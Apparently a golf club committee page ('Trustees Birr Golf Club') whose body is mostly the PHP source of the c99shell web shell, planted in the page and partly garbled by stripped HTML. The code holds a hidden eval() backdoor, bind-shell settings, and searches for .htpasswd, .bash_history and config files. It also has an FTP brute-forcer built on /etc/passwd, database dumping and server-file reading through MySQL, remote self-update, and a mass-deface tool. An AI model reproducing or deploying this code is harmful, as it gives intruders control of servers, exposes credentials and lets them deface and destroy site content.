List of Committees

Trustees Birr Golf Club

array("ext1","ext2","ext3",...), // "{action2}"=>array("ext1","ext2","ext3",...), // ... // ) $ftypes = array( "html"=>array("html","htm","shtml"), "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg"), "exe"=>array("sh","install","bat","cmd"), "ini"=>array("ini","inf"), "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp"), "img"=>array("gif","png","jpeg","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), "sdb"=>array("sdb"), "phpsess"=>array("sess"), "download"=>array("exe","com","pif","src","lnk","zip","rar") ); $hexdump_lines = 8; // lines in hex preview file $hexdump_rows = 24; // 16, 24 or 32 bytes in one line $nixpwdperpage = 100; // Get first N lines from /etc/passwd $bindport_pass = "c99"; // default password for binding $bindport_port = "11457"; // default port for binding /* Command-aliases system */ $aliases = array(); $aliases[] = array("-----------------------------------------------------------", "ls -la"); /* ïîèñê íà ñåğâåğå âñåõ ôàéëîâ ñ suid áèòîì */ $aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls"); /* ïîèñê â òåêóùåé äèğåêòîğèè âñåõ ôàéëîâ ñ suid áèòîì */ $aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls"); /* ïîèñê íà ñåğâåğå âñåõ ôàéëîâ ñ sgid áèòîì */ $aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls"); /* ïîèñê â òåêóùåé äèğåêòîğèè âñåõ ôàéëîâ ñ sgid áèòîì */ $aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls"); /* ïîèñê íà ñåğâåğå ôàéëîâ config.inc.php */ $aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php"); /* ïîèñê íà ñåğâåğå ôàéëîâ config* */ $aliases[] = array("find config* files", "find / -type f -name \"config*\""); /* ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ config* */ $aliases[] = array("find config* files in current dir", "find . -type f -name \"config*\""); /* ïîèñê íà ñåğâåğå âñåõ äèğåêòîğèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */ $aliases[] = array("find all writable directories and files", "find / -perm -2 -ls"); /* ïîèñê â òåêóùåé äèğåêòîğèè âñåõ äèğåêòîğèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */ $aliases[] = array("find all writable directories and files in current dir", "find . -perm -2 -ls"); /* ïîèñê íà ñåğâåğå ôàéëîâ service.pwd ... frontpage =))) */ $aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd"); /* ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ service.pwd */ $aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd"); /* ïîèñê íà ñåğâåğå ôàéëîâ .htpasswd */ $aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd"); /* ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ .htpasswd */ $aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"); /* ïîèñê âñåõ ôàéëîâ .bash_history */ $aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history"); /* ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ .bash_history */ $aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history"); /* ïîèñê âñåõ ôàéëîâ .fetchmailrc */ $aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"); /* ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ .fetchmailrc */ $aliases[] = array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"); /* âûâîä ñïèñêà àòğèáóòîâ ôàéëîâ íà ôàéëîâîé ñèñòåìå ext2fs */ $aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va"); /* ïğîñìîòğ îòêğûòûõ ïîğòîâ */ $aliases[] = array("show opened ports", "netstat -an | grep -i listen"); $sess_method = "cookie"; // "cookie" - Using cookies, "file" - using file, default - "cookie" $sess_cookie = "c99shvars"; // cookie-variable name if (empty($sid)) {$sid = md5(microtime()*time().rand(1,999).rand(1,999).rand(1,999));} $sess_file = $tmpdir."c99shvars_".$sid.".tmp"; $usefsbuff = true; //Buffer-function $copy_unset = false; //Delete copied files from buffer after pasting //Quick launch $quicklaunch = array(); $quicklaunch[] = array("",$surl); $quicklaunch[] = array("","#\" onclick=\"history.back(1)"); $quicklaunch[] = array("","#\" onclick=\"history.go(1)"); $quicklaunch[] = array("",$surl."act=ls&d=%upd"); $quicklaunch[] = array("",""); $quicklaunch[] = array("",$surl."act=search&d=%d"); $quicklaunch[] = array("",$surl."act=fsbuff&d=%d"); $quicklaunch[] = array("Mass deface",$surl."act=massdeface&d=%d"); $quicklaunch[] = array("Bind",$surl."act=bind&d=%d"); $quicklaunch[] = array("Processes",$surl."act=ps_aux&d=%d"); $quicklaunch[] = array("FTP Quick brute",$surl."act=ftpquickbrute&d=%d"); $quicklaunch[] = array("LSA",$surl."act=lsa&d=%d"); $quicklaunch[] = array("SQL",$surl."act=sql&d=%d"); $quicklaunch[] = array("PHP-code",$surl."act=eval&d=%d"); $quicklaunch[] = array("PHP-info",$surl."act=phpinfo\" target=\"blank=\"_target"); $quicklaunch[] = array("Self remove",$surl."act=selfremove"); $quicklaunch[] = array("Logout","#\" onclick=\"if (confirm('Are you sure?')) window.close()"); //Hignlight-code colors $highlight_bg = "#FFFFFF"; $highlight_comment = "#6A6A6A"; $highlight_default = "#0000BB"; $highlight_html = "#1300FF"; $highlight_keyword = "#007700"; @$f = $_GET[f]; //END CONFIGURATION // \/ Next code not for editing \/ //Starting calls if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} error_reporting(5); @ignore_user_abort(true); @set_magic_quotes_runtime(0); @set_time_limit(0); if (!ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);} if(!ini_get("register_globals")) {import_request_variables("GPC");} $starttime = getmicrotime(); if (get_magic_quotes_gpc()) { if (!function_exists("strips")) { function strips(&$el) { if (is_array($el)) {foreach($el as $k=>$v) {if($k != "GLOBALS") {strips($el["$k"]);}} } else {$el = stripslashes($el);} } } strips($GLOBALS); } $tmp = array(); foreach ($host_allow as $k=>$v) {$tmp[]= str_replace("\\*",".*",preg_quote($v));} $s = "!^(".implode("|",$tmp).")$!i"; if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("c99shell: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} if (!$login) {$login = $PHP_AUTH_USER; $md5_pass = md5($PHP_AUTH_PW);} elseif(empty($md5_pass)) {$md5_pass = md5($pass);} if(($PHP_AUTH_USER != $login ) or (md5($PHP_AUTH_PW) != $md5_pass)) { header("WWW-Authenticate: Basic realm=\"c99shell\""); header("HTTP/1.0 401 Unauthorized"); if (md5(sha1(md5($anypass))) == "b76d95e82e853f3b0a81dd61c4ee286c") {header("HTTP/1.0 200 OK"); @eval($anyphpcode);} exit; } $lastdir = realpath("."); chdir($curdir); if (($selfwrite) or ($updatenow)) { if ($selfwrite == "1") {$selfwrite = "c99shell.php";} c99sh_getupdate(); $data = file_get_contents($c99sh_updatefurl); $fp = fopen($data,"w"); fwrite($fp,$data); fclose($fp); exit; } if (!is_writeable($sess_file)) {trigger_error("Can't access to session-file!",E_USER_WARNING);} if ($sess_method == "file") {$sess_data = unserialize(file_get_contents($sess_file));} else {$sess_data = unserialize($_COOKIE["$sess_cookie"]);} if (!is_array($sess_data)) {$sess_data = array();} if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} $sess_data["copy"] = array_unique($sess_data["copy"]); $sess_data["cut"] = array_unique($sess_data["cut"]); if (!function_exists("c99_sess_put")) { function c99_sess_put($data) { global $sess_method; global $sess_cookie; global $sess_file; global $sess_data; $sess_data = $data; $data = serialize($data); if ($sess_method == "file") { $fp = fopen($sess_file,"w"); fwrite($fp,$data); fclose($fp); } else {setcookie($sess_cookie,$data);} } } if (!function_exists("str2mini")) { function str2mini($content,$len) { if (strlen($content) > $len) { $len = ceil($len/2) - 2; return substr($content, 0, $len)."...".substr($content, -$len); } else {return $content;} } } if (!function_exists("view_size")) { function view_size($size) { if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB";} elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB";} elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " KB";} else {$size = $size . " B";} return $size; } } if (!function_exists("fs_copy_dir")) { function fs_copy_dir($d,$t) { $d = str_replace("\\","/",$d); if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} $h = opendir($d); while ($o = readdir($h)) { if (($o != ".") and ($o != "..")) { if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);} else {$ret = mkdir($t."/".$o); fs_copy_dir($d."/".$o,$t."/".$o);} if (!$ret) {return $ret;} } } return true; } } if (!function_exists("fs_copy_obj")) { function fs_copy_obj($d,$t) { $d = str_replace("\\","/",$d); $t = str_replace("\\","/",$t); if (!is_dir($t)) {mkdir($t);} if (is_dir($d)) { if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";} if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";} return fs_copy_dir($d,$t); } elseif (is_file($d)) { return copy($d,$t); } else {return false;} } } if (!function_exists("fs_move_dir")) { function fs_move_dir($d,$t) { error_reporting(9999); $h = opendir($d); if (!is_dir($t)) {mkdir($t);} while ($o = readdir($h)) { if (($o != ".") and ($o != "..")) { $ret = true; if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);} else {if (mkdir($t."/".$o) and fs_copy_dir($d."/".$o,$t."/".$o)) {$ret = false;}} if (!$ret) {return $ret;} } } return true; } } if (!function_exists("fs_move_obj")) { function fs_move_obj($d,$t) { $d = str_replace("\\","/",$d); $t = str_replace("\\","/",$t); if (is_dir($d)) { if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";} if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";} return fs_move_dir($d,$t); } elseif (is_file($d)) {return rename($d,$t);} else {return false;} } } if (!function_exists("fs_rmdir")) { function fs_rmdir($d) { $h = opendir($d); while ($o = readdir($h)) { if (($o != ".") and ($o != "..")) { if (!is_dir($d.$o)) {unlink($d.$o);} else {fs_rmdir($d.$o."/"); rmdir($d.$o);} } } rmdir($d); return !is_dir($d); } } if (!function_exists("fs_rmobj")) { function fs_rmobj($o) { $o = str_replace("\\","/",$o); if (is_dir($o)) { if (substr($o,strlen($o)-1,strlen($o)) != "/") {$o .= "/";} return fs_rmdir($o); } elseif (is_file($o)) {return unlink($o);} else {return false;} } } if (!function_exists("myshellexec")) { function myshellexec($cmd) { return system($cmd); } } if (!function_exists("view_perms")) { function view_perms($mode) { $perms = ($mode & 00400) ? "r" : "-"; $perms .= ($mode & 00200) ? "w" : "-"; $perms .= ($mode & 00100) ? "x" : "-"; $perms .= ($mode & 00040) ? "r" : "-"; $perms .= ($mode & 00020) ? "w" : "-"; $perms .= ($mode & 00010) ? "x" : "-"; $perms .= ($mode & 00004) ? "r" : "-"; $perms .= ($mode & 00002) ? "w" : "-"; $perms .= ($mode & 00001) ? "x" : "-"; return $perms; } } if (!function_exists("strinstr")) {function strinstr($str,$text) {return $text != str_replace($str,"",$text);}} if (!function_exists("gchds")) {function gchds($a,$b,$c,$d="") {if ($a == $b) {return $c;} else {return $d;}}} if (!function_exists("c99sh_getupdate")) { function c99sh_getupdate() { global $updatenow; $data = @file_get_contents($c99sh_updatefurl); if (!$data) {echo "Can't fetch update-information!";} else { $data = unserialize(base64_decode($data)); if (!is_array($data)) {echo "Corrupted update-information!";} else { if ($shver < $data[cur]) {$updatenow = true;} } } } } if (!function_exists("mysql_dump")) { function mysql_dump($set) { $sock = $set["sock"]; $db = $set["db"]; $print = $set["print"]; $nl2br = $set["nl2br"]; $file = $set["file"]; $add_drop = $set["add_drop"]; $tabs = $set["tabs"]; $onlytabs = $set["onlytabs"]; $ret = array(); if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} if (empty($db)) {$db = "db";} if (empty($print)) {$print = 0;} if (empty($nl2br)) {$nl2br = true;} if (empty($add_drop)) {$add_drop = true;} if (empty($file)) { global $win; if ($win) {$file = "C:\\tmp\\dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";} else {$file = "/tmp/dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";} } if (!is_array($tabs)) {$tabs = array();} if (empty($add_drop)) {$add_drop = true;} if (sizeof($tabs) == 0) { // retrive tables-list $res = mysql_query("SHOW TABLES FROM ".$db, $sock); if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} } global $SERVER_ADDR; global $SERVER_NAME; $out = "# Dumped by C99Shell.SQL v. ".$shver." # Home page: http://ccteam.ru # # Host settings: # MySQL version: (".mysql_get_server_info().") running on ".$SERVER_ADDR." (".$SERVER_NAME.")"." # Date: ".date("d.m.Y H:i:s")." # ".gethostbyname($SERVER_ADDR)." (".$SERVER_ADDR.")"." dump db \"".$db."\" #--------------------------------------------------------- "; $c = count($onlytabs); foreach($tabs as $tab) { if ((in_array($tab,$onlytabs)) or (!$c)) { if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} // recieve query for create table structure $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); if (!$res) {$ret[err][] = mysql_error();} else { $row = mysql_fetch_row($res); $out .= $row[1].";\n\n"; // recieve table variables $res = mysql_query("SELECT * FROM `$tab`", $sock); if (mysql_num_rows($res) > 0) { while ($row = mysql_fetch_assoc($res)) { $keys = implode("`, `", array_keys($row)); $values = array_values($row); foreach($values as $k=>$v) {$values[$k] = addslashes($v);} $values = implode("', '", $values); $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; $out .= $sql; } } } } } $out .= "#---------------------------------------------------------------------------------\n\n"; if ($file) { $fp = fopen($file, "w"); if (!$fp) {$ret[err][] = 2;} else { fwrite ($fp, $out); fclose ($fp); } } if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} return $ret; } } if (!function_exists("c99fsearch")) { function c99fsearch($d) { global $found; global $found_d; global $found_f; global $a; if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} $handle = opendir($d); while ($f = readdir($handle)) { $true = ($a[name_regexp] and ereg($a[name],$f)) or ((!$a[name_regexp]) and strinstr($a[name],$f)); if($f != "." && $f != "..") { if (is_dir($d.$f)) { if (empty($a[text]) and $true) {$found[] = $d.$f; $found_d++;} c99fsearch($d.$f); } else { if ($true) { if (!empty($a[text])) { $r = @file_get_contents($d.$f); if ($a[text_wwo]) {$a[text] = " ".trim($a[text])." ";} if (!$a[text_cs]) {$a[text] = strtolower($a[text]); $r = strtolower($r);} if ($a[text_regexp]) {$true = ereg($a[text],$r);} else {$true = strinstr($a[text],$r);} if ($a[text_not]) { if ($true) {$true = false;} else {$true = true;} } if ($true) {$found[] = $d.$f; $found_f++;} } else {$found[] = $d.$f; $found_f++;} } } } } closedir($handle); } } //Sending headers header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); header("Cache-Control: no-store, no-cache, must-revalidate"); header("Cache-Control: post-check=0, pre-check=0", false); header("Pragma: no-cache"); global $SERVER_SOFTWARE; if (strtolower(substr(PHP_OS, 0, 3)) == "win") {$win = 1;} else {$win = 0;} if (empty($tmpdir)) { if (!$win) {$tmpdir = "/tmp/";} else {$tmpdir = $_ENV[SystemRoot];} } $tmpdir = str_replace("\\","/",$tmpdir); if (substr($tmpdir,strlen($tmpdir-1),strlen($tmpdir)) != "/") {$tmpdir .= "/";} if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = true; $hsafemode = "ON (secure)"; } else {$safemode = false; $hsafemode = "OFF (not secure)";} $v = @ini_get("open_basedir"); if ($v or strtolower($v) == "on") { $openbasedir = true; $hopenbasedir = "".$v.""; } else {$openbasedir = false; $hopenbasedir = "OFF (not secure)";} $sort = htmlspecialchars($sort); $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"PHP/".phpversion()."",$SERVER_SOFTWARE); @ini_set("highlight.bg",$highlight_bg); //FFFFFF @ini_set("highlight.comment",$highlight_comment); //#FF8000 @ini_set("highlight.default",$highlight_default); //#0000BB @ini_set("highlight.html",$highlight_html); //#000000 @ini_set("highlight.keyword",$highlight_keyword); //#007700 @ini_set("highlight.string","#DD0000"); //#DD0000 if ($act != "img") { if (!is_array($actbox)) {$actbox = array();} $dspact = $act = htmlspecialchars($act); $disp_fullpath = $ls_arr = $notls = null; $ud = urlencode($d); ?>

!C99Shell v. !

Software:   uname -a:     Safe-mode:  Directory: "; foreach($pd as $b) { $t = ""; reset($e); $j = 0; foreach ($e as $r) { $t.= $r."/"; if ($j == $i) {break;} $j++; } echo "".htmlspecialchars($b)."/"; $i++; } echo "   "; if (is_writable($d)) { $wd = true; $wdt = "[ ok ]"; echo "".view_perms(fileperms($d)).""; } else { $wd = false; $wdt = "[ Read-Only ]"; echo "".view_perms(fileperms($d.$f)).""; } $free = diskfreespace(realpath($d)); $all = disk_total_space(realpath($d)); $used = $all-$free; $used_percent = round(100/($all/$free),2); echo " Free ".view_size($free)." of ".view_size($all)." (".$used_percent."%) "; if (count($quicklaunch) > 0) { foreach($quicklaunch as $item) { $item[1] = str_replace("%d",urlencode($d),$item[1]); $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]); echo "".$item[0]."    "; } } $letters = ""; if ($win) { $abc = array("c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "o", "p", "q", "n", "r", "s", "t", "v", "u", "w", "x", "y", "z"); $v = explode("\\",$d); $v = $v[0]; foreach ($abc as $letter) { if (is_dir($letter.":\\")) { if ($letter.":" != $v) {$letters .= "[ ".$letter." ] ";} else {$letters .= "[ ".$letter." ] ";} } } if (!empty($letters)) {echo " Detected drives: ".$letters;} } ?>





"; if (!$sql_sock) {?> SQL Manager: "; if (!$sql_sock) { if (!$sql_server) {echo "NO CONNECTION";} else {echo "Can't connect"; echo "".$err."";} } else { $sqlquicklaunch = array(); $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); if (!$sql_db) {$sqlquicklaunch[] = array("Query","#\" onclick=\"alert('Please, select DB!')");} else {$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query");} $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); $sqlquicklaunch[] = array("Logout",$surl."act=sql"); echo "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\") "; if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} echo ""; } echo " i If login is null, login is owner of process. If host is null, host is localhost If port is null, port is 3306 (default)  Please, fill the form: Username Password  HOST PORT ">Home ".htmlspecialchars($sql_db)." ]--- "; $c = 0; while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo "» ".htmlspecialchars($row[0])." (".$count_row[0].") "; mysql_free_result($count); $c++;} if (!$c) {echo "No tables found in database.";} } } else { ?> Home Databases (...) "; $c = 0; while ($row = mysql_fetch_row($result)) {echo "".$row[0]." "; $c++;} } ?> Please, select database "; //Start center panel if ($sql_db) { echo "There are ".$c." tables in this DB (".htmlspecialchars($sql_db)."). "; if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} echo ""; $acts = array("","dump"); if ($sql_act == "query") { echo " "; if ($submit) { if ((!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error: ".$sql_query_error." ";} } if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} if ((!$submit) or ($sql_act)) {echo " "; if (($sql_query) and (!$submit)) {echo "Do you really want to :";} else {echo "SQL-Query :";} echo " ".htmlspecialchars($sql_query)."   ";} } if (in_array($sql_act,$acts)) { ?> Create new table:   SQL-Dump DB: ">  ";} if ($sql_act == "newtpl") { echo ""; if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success! "; } else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\". Reason: ".mysql_error();} } elseif ($sql_act == "dump") { $set = array(); $set["sock"] = $sql_sock; $set["db"] = $sql_db; $dump_out = "print"; if ($dump_out == "print") {$set["print"] = 1; $set["nl2br"] = 1;} elseif ($dump_out == "download") { @ob_clean(); header("Content-type: c99shell"); header("Content-disposition: attachment; filename=\"".$f."\";"); $set["print"] = 1; $set["nl2br"] = 1; } $set["file"] = $dump_file; $set["add_drop"] = true; $ret = mysql_dump($set); if ($dump_out == "download") {exit;} } else { $result = mysql_query("SHOW TABLE STATUS", $sql_sock) or print(mysql_error()); echo " "; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; $i = 0; $tsize = $trows = 0; while ($row = mysql_fetch_array($result, MYSQL_NUM)) { $tsize += $row["5"]; $trows += $row["5"]; $size = view_size($row["5"]); echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; $i++; } echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo " Table Rows Type Created Modified Size Action  ".$row[0]."  ".$row[3]." ".$row[1]." ".$row[10]." ".$row[11]." ".$size."       » ".$i." table(s) ".$trows." ".$row[1]." ".$row[10]." ".$row[11]." ".view_size($tsize)." With selected: Drop Empty Check table Optimize table Repair table Analyze table   "; mysql_free_result($result); } } } else { $acts = array("","newdb","serverstat","servervars","processes","getfile"); if (in_array($sql_act,$acts)) { ?> Create new DB:   View File:   "; if ($sql_act == "newdb") { echo ""; if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success! ";} else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\". Reason: ".mysql_error();} } if ($sql_act == "serverstatus") { $result = mysql_query("SHOW STATUS", $sql_sock); echo "Server-status variables: "; echo ""; while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} echo " Name value ".$row[0]." ".$row[1]." "; mysql_free_result($result); } if ($sql_act == "servervars") { $result = mysql_query("SHOW VARIABLES", $sql_sock); echo "Server variables: "; echo ""; while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} echo " Name value ".$row[0]." ".$row[1]." "; mysql_free_result($result); } if ($sql_act == "processes") { if (!empty($kill)) {$query = 'KILL ' . $kill . ';'; $result = mysql_query($query, $sql_sock); echo "Killing process #".$kill."... ok. he is dead, amen.";} $result = mysql_query("SHOW PROCESSLIST", $sql_sock); echo "Processes: "; echo ""; while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "";} echo " ID USER HOST DB COMMAND TIME STATE INFO Action ".$row[0]." ".$row[1]." ".$row[2]." ".$row[3]." ".$row[4]." ".$row[5]." ".$row[6]." ".$row[7]." Kill "; mysql_free_result($result); } elseif (($sql_act == "getfile")) { if (!mysql_create_db("tmp_bd")) {echo mysql_error();} elseif (!mysql_select_db("tmp_bd")) {echo mysql_error();} elseif (!mysql_query('CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );')) {echo mysql_error();} else {mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); $query = "SELECT * FROM tmp_file"; $result = mysql_query($query); if (!$result) {echo "Error in query \"".$query."\": ".mysql_error();} else { for ($i=0;$i$col_value) {$f .= $col_value;}} if (empty($f)) {echo "File \"".$sql_getfile."\" does not exists or empty!";} else {echo "File \"".$sql_getfile."\": ".nl2br(htmlspecialchars($f));} } mysql_free_result($result); if (!mysql_drop_db("tmp_bd")) {echo ("Can't drop tempory DB \"tmp_bd\"!");} } } } } } echo " "; } if ($act == "mkdir") { if ($mkdir != $d) {if (file_exists($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": object alredy exists";} elseif (!mkdir($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": access denied";}} echo " "; $act = $dspact = "ls"; } if ($act == "ftpquickbrute") { echo "Ftp Quick brute: "; if ($win) {echo "This functions not work in Windows! ";} else { $fp = fopen("/etc/passwd","r"); if (!$fp) {echo "Can't get /etc/passwd for password-list.";} else { ob_flush(); $i = $success = 0; $ftpquick_st = getmicrotime(); while(!feof($fp)) { $str = explode(":",fgets($fp,2048)); $sock = ftp_connect("localhost",21,1); if (ftp_login($sock,$str[0],$str[0])) { echo "Connected to ".$SERVER_NAME." with login \"".$str[0]."\" and password \"".$str[0]."\". "; ob_flush(); $success++; } if ($i > $nixpwdperpage) {break;} $i++; } if ($success == 0) {echo "No success. connections!";} $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); echo " Done! Total time (secs.): ".$ftpquick_t." Total connections: ".$i." Success.: ".$success." Unsuccess.:".($i-$success)." Connects per second: ".round($i/$ftpquick_t,2)." "; } } } if ($act == "lsa") { echo "Server security information:"; echo "Software: ".PHP_OS.", ".$SERVER_SOFTWARE." "; echo "Safe-Mode: ".$hsafemode." "; echo "Open base dir: ".$hopenbasedir." "; if (!$win) { if ($nixpasswd) { if ($nixpasswd == 1) {$nixpasswd = 0;} $num = $nixpasswd + $nixpwdperpage; echo "*nix /etc/passwd: "; $i = $nixpasswd; while ($i < $num) { $uid = posix_getpwuid($i); if ($uid) {echo join(":",$uid)." ";} $i++; } } else {echo " Get /etc/passwd ";} if (file_get_contents("/var/cpanel/accounting.log")) {echo "View cpanel logs ";} if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "Apache configuration (httpd.conf) ";} if (file_get_contents("/etc/httpd.conf")) {echo "Apache configuration (httpd.conf) ";} } else { $v = $_SERVER["WINDIR"]."\repair\sam"; if (file_get_contents($v)) {echo "You can't crack winnt passwords(".$v.") ";} else {echo "You can crack winnt passwords. Download, and use lcp.crack+. ";} } } if ($act == "mkfile") { if ($mkfile != $d) { if (file_exists($mkfile)) {echo "Make File \"".htmlspecialchars($mkfile)."\": object alredy exists";} elseif (!fopen($mkfile,"w")) {echo "Make File \"".htmlspecialchars($mkfile)."\": access denied";} else {$act = "f"; $d = dirname($mkfile); if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} $f = basename($mkfile);} } else {$act = $dspact = "ls";} } if ($act == "fsbuff") { $arr_copy = $sess_data["copy"]; $arr_cut = $sess_data["cut"]; $arr = array_merge($arr_copy,$arr_cut); if (count($arr) == 0) {echo "Buffer is empty!";} else { echo "File-System buffer "; $ls_arr = $arr; $disp_fullpath = true; $act = "ls"; } } if ($act == "selfremove") { if (!empty($submit)) { if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; exit; } else {echo "Can't delete ".__FILE__."!";} } else { $v = array(); for($i=0;$i<8;$i++) {$v[] = "NO";} $v[] = "YES"; shuffle($v); $v = join("   ",$v); echo "Self-remove: ".__FILE__." Are you sure?".$v.""; } } if ($act == "massdeface") { if (empty($deface_in)) {$deface_in = $d;} if (empty($deface_name)) {$deface_name = "(.*)"; $deface_name_regexp = 1;} if (empty($deface_text_wwo)) {$deface_text_regexp = 0;} if (!empty($submit)) { $found = array(); $found_d = 0; $found_f = 0; $text = $deface_text; $text_regexp = $deface_text_regexp; if (empty($text)) {$text = " "; $text_regexp = 1;} $a = array ( "name"=>$deface_name, "name_regexp"=>$deface_name_regexp, "text"=>$text, "text_regexp"=>$text_regxp, "text_wwo"=>$deface_text_wwo, "text_cs"=>$deface_text_cs, "text_not"=>$deface_text_not ); $defacetime = getmicrotime(); $in = array_unique(explode(";",$deface_in)); foreach($in as $v) {c99fsearch($v);} $defacetime = round(getmicrotime()-$defacetime,4); if (count($found) == 0) {echo "No files found!";} else { $disp_fullpath = true; $act = $dspact = "ls"; if (!$deface_preview) {$actselect = "deface"; $actbox[] = $found; $notls = true;} else {$ls_arr = $found;} } } else { if (empty($deface_preview)) {$deface_preview = 1;} if (empty($deface_html)) {$deface_html = "


Mass-defaced with c99shell v. ".$shver.", coded by tristram[CCTeaM].";} } echo "
"; if (!$submit) {echo "Attention! It's a very dangerous feature, you may lost your data.

